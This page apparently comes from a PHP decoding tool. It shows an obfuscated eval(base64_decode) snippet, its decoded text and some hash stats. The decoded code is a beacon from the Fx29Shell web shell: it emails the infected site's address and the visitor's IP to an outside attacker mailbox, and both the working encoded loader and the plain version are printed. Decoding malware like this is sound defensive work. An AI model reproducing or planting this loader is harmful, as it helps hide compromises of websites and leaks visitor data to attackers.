Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(base64_decode('JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCA..
Decoded Output download
$visitcount = $HTTP_COOKIE_VARS["visits"]; if( $visitcount == "") {$visitcount = 0; $visitor = $_SERVER["REMOTE_ADDR"]; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $target = rawurldecode($web.$inj); $body = "Boss, there was an injected target on $target by $visitor"; @mail("[email protected]","Fx29Shell http://$target by $visitor", "$body"); } else { $visitcount; } setcookie("visits",$visitcount);
Did this file decode correctly?
Original Code
<?php
eval(base64_decode('JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkdGFyZ2V0ID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7ICRib2R5ID0gIkJvc3MsIHRoZXJlIHdhcyBhbiBpbmplY3RlZCB0YXJnZXQgb24gJHRhcmdldCBieSAkdmlzaXRvciI7IEBtYWlsKCJzaGltYXJpbnNlY0B5YWhvby5jb20iLCJGeDI5U2hlbGwgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiLCAiJGJvZHkiKTsgfSBlbHNlIHsgJHZpc2l0Y291bnQ7IH0gc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGNvdW50KTs='));
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 69c064faeb5707bd789d6057c249d44f |
Eval Count | 1 |
Decode Time | 59 ms |